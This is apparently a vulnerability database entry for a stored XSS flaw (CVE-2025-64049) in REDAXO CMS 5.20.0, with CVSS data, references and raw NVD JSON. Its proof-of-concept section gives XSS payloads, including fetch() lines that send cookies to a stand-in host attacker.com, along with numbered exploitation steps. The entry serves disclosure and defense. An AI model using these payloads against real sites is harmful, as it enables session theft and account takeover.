CVE-2025-64049

Description

A stored cross-site scripting (XSS) vulnerability in the module management component in REDAXO CMS 5.20.0 allows remote users to inject arbitrary web script or HTML via the Output code field in modules. The payload is executed when a user views or edits an article by adding slice that uses the compromised module.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:redaxo:redaxo:5.20.0:*:*:*:*:*:*:* - VULNERABLE

REDAXO CMS 5.20.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- REDAXO CMS 5.20.0 Stored XSS PoC -->
<!-- Module Output Code Field Payload -->
<script>alert(document.cookie)</script>

<!-- Alternative payloads -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Steps to exploit -->
<!-- 1. Login to REDAXO CMS 5.20.0 with admin/editor privileges -->
<!-- 2. Navigate to: Modules -> Add/Edit Module -->
<!-- 3. In 'Output' code field, insert the XSS payload -->
<!-- 4. Save the module -->
<!-- 5. Create or edit an article that uses this module -->
<!-- 6. When victim views/edits the article, XSS payload executes -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64049
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64049
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64049/
[4] VulDB https://vuldb.com/cve/CVE-2025-64049
[5] https://drive.google.com/drive/folders/1SpwL548ZBRYU_uL8W7Riv7VHshr2UN0R?usp=sharing
[6] https://github.com/redaxo/redaxo
[7] https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64049.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64049", "sourceIdentifier": "[email protected]", "published": "2025-11-25T16:16:07.200", "lastModified": "2025-12-03T17:06:05.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability in the module management component in REDAXO CMS 5.20.0 allows remote users to inject arbitrary web script or HTML via the Output code field in modules. The payload is executed when a user views or edits an article by adding slice that uses the compromised module."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redaxo:redaxo:5.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "925CD38C-2DA9-4440-AED4-EFBE03160E71"}]}]}], "references": [{"url": "https://drive.google.com/drive/folders/1SpwL548ZBRYU_uL8W7Riv7VHshr2UN0R?usp=sharing", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/redaxo/redaxo", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-64049.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}